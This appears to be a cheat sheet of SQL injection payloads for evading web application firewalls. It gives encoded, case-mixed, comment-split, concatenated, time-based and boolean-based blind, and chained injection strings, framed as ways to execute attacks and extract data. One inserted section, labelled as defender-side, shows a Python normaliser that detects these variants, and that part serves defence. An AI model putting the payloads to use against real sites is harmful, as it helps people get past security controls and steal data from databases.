WAF Bypass Techniques for SQL Injection
Below are various methods used to bypass WAFs and execute SQL injection attacks. Each technique takes advantage of different obfuscation, encoding, and manipulation strategies to evade detection.
1. Using Encoding and Obfuscation
URL Encoding
Encode parts of the payload to bypass basic keyword detection mechanisms used by WAFs.
%27%20UNION%20SELECT%20NULL,NULL,NULL--
Double URL Encoding
Double encode the payload to evade more sophisticated detection mechanisms.
%2527%2520UNION%2520SELECT%2520NULL,NULL,NULL--
Hex Encoding
Use hexadecimal literals in place of quoted string values so the readable strings (here 'admin' and 'password') never appear in the request.
' UNION SELECT 0x61646D696E, 0x70617373776F7264 --
2. Case Manipulation and Comments
Mixed Case
Change the case of SQL keywords to avoid case-sensitive filters.
' uNioN SeLecT NULL, NULL --
Inline Comments
Insert comments within SQL keywords to break up recognizable patterns.
' UNION/**/SELECT/**/NULL,NULL --
3. Whitespace and Special Characters
Using Different Whitespace Characters
Replace spaces with other whitespace characters like tabs or newlines to confuse simple string-matching filters.
' UNION%0D%0ASELECT%0D%0A NULL,NULL --
Concatenation with Special Characters
Use special characters and concatenation functions to dynamically build the payload.
' UNION SELECT CHAR(117)||CHAR(115)||CHAR(101)||CHAR(114), CHAR(112)||CHAR(97)||CHAR(115)||CHAR(115) --
4. SQL Function and Command Obfuscation
String Concatenation
Break strings into smaller parts and concatenate them to obscure the payload.
' UNION SELECT 'ad'||'min', 'pa'||'ss' --
Using SQL Functions
Leverage SQL functions to manipulate and obfuscate the payload.
' UNION SELECT VERSION(), DATABASE() --
5. Time-Based and Boolean-Based Payloads
Time-Based Blind SQL Injection
Use time delays to infer information based on the response time.
' AND IF(1=1, SLEEP(5), 0) --
Boolean-Based Blind SQL Injection
Use conditional statements to alter the response based on true or false conditions.
' AND IF(1=1, 'A', 'B')='A' --
6. Advanced Encoding Techniques
Base64 Encoding
Encode payloads using Base64 to bypass content filters. Note that FROM_BASE64() only returns the decoded string as data; the decoded text is not executed as SQL.
' UNION SELECT FROM_BASE64('c2VsZWN0IHZlcnNpb24oKQ==') --
Custom Encoding Scripts
Develop custom scripts to encode and decode payloads in different formats to evade detection.
7. Chaining Techniques
Combining Multiple Bypass Techniques
Combine various techniques to create more complex and harder-to-detect payloads.
%27%20UNION/**/SELECT/**/CHAR(117)%7C%7CCHAR(115)%7C%7CCHAR(101)%7C%7CCHAR(114),%20CHAR(112)%7C%7CCHAR(97)%7C%7CCHAR(115)%7C%7CCHAR(115)%20--%0A
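As an added, defender-side example that is not part of the original page: a Python normaliser that undoes the transformations catalogued above (repeated URL decoding, inline-comment stripping, whitespace collapsing, case folding) before applying a single signature, run against constructed sample parameters modelled on the payload shapes shown on this page. It shows why a literal match on the raw request misses every variant, while the normalised match catches all of them without flagging the benign input.

```python
import re
from urllib.parse import unquote

# Constructed sample parameter values, shaped like the payload variants above.
SAMPLE_PARAMS = {
    "url_encoded": "%27%20UNION%20SELECT%20NULL,NULL,NULL--",
    "double_encoded": "%2527%2520UNION%2520SELECT%2520NULL,NULL,NULL--",
    "mixed_case": "' uNioN SeLecT NULL, NULL --",
    "inline_comments": "' UNION/**/SELECT/**/NULL,NULL --",
    "crlf_whitespace": "' UNION%0D%0ASELECT%0D%0A NULL,NULL --",
    "chained": "%27%20UNION/**/SELECT/**/CHAR(117)%7C%7CCHAR(115),%20CHAR(112)%20--%0A",
    "benign": "search=Union%20Station%20gift%20select",
}

# One signature, applied either to the raw value or to its normalised form.
SIGNATURE = re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b")


def naive_match(raw: str) -> bool:
    """Case-sensitive literal match on the raw parameter: what a trivial filter does."""
    return bool(SIGNATURE.search(raw))


def normalize(raw: str, max_rounds: int = 3) -> str:
    """Canonicalise a parameter value before inspection.

    Decodes percent-encoding until the value stops changing (bounded, so a
    pathological input cannot loop forever), replaces inline comments with a
    space so UNION/**/SELECT becomes two ordinary tokens, collapses tabs and
    CR/LF into single spaces, and upper-cases the result.
    """
    value = raw
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    value = re.sub(r"\s+", " ", value)
    return value.upper().strip()


def normalized_match(raw: str) -> bool:
    """Same signature, but applied after normalisation."""
    return bool(SIGNATURE.search(normalize(raw)))


def evaluate(params: dict) -> dict:
    """Return {name: (naive_hit, normalized_hit)} for each sample parameter."""
    return {name: (naive_match(v), normalized_match(v)) for name, v in params.items()}
```

Every sample, including the benign one, evades the raw literal match; after normalisation all six injection variants hit the single signature and the benign value still does not.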
8. Leveraging Lesser-Known SQL Features
Using JSON Functions
Leverage JSON functions to manipulate and extract data in a more complex manner.
' UNION SELECT json_extract(column_name, '$.key') FROM table_name --
Using XML Functions
Utilize XML functions to construct more sophisticated payloads.
' UNION SELECT extractvalue(1, 'version()') --
These techniques highlight various methods to bypass WAFs and execute SQL injection attacks. Each technique takes advantage of different obfuscation, encoding, and manipulation strategies to evade detection and extract data from vulnerable databases.